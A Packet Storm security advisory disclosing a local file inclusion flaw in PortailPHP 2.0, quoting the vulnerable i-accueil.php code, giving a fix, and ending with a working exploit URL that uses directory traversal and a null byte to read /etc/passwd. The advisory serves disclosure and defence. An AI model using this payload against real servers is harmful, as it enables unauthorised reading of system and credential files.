Portail PHP version 2.0 suffers from a local file inclusion vulnerability.
f2a3c3253a127a6e100615a5eb7e4007d153297fdd9c9c2fb3eff3acc48f8c09[START]
#########################################################################################
[0x01] Informations:
Script : Portailphp 2.0
Download : http://www.safari-msi.com/portailphp/mod_file/upload/PortailPHP-v2.0.zip
Vulnerability : Local File Inclusion
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org
Notes : Proud to be Italian
Greets: : XaDoS, x0r, emgent, Jay, str0ke. Expecially to: AlpHaNiX
#########################################################################################
[0x02] Bug:[Local File Inclusion]
######
Bugged file is: /[path]/i-accueil.php
[CODE]
<?php
/*
PORTAILPHP
*/
echo "<table width='100%'><tr><td>";
echo "<img border='0' src='themes/" . $_SESSION["App_Theme"] . "/ico-fleche01.gif' alt=''>
Bienvenue sur <strong>$App_Me_Titre</strong><br /><br />" ;
include("$chemin/mod_news/index.php");
echo "</td></tr></table>";
?>
[/CODE]
$chemin is not declared, so we can set its value from GET.
[!] FIX: Just declare $chemin, or don't include it, becouse it's not necessary.
i-accueil.php is in the / path, like /mod_news/index.php.
Secure include: include("/mod_news/index.php");
[!] EXPLOIT: /[path]/i-accueil.php?chemin=[local_file_to_include]
../../../../../../../../../../../etc/passwd%00
#########################################################################################
[/END]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed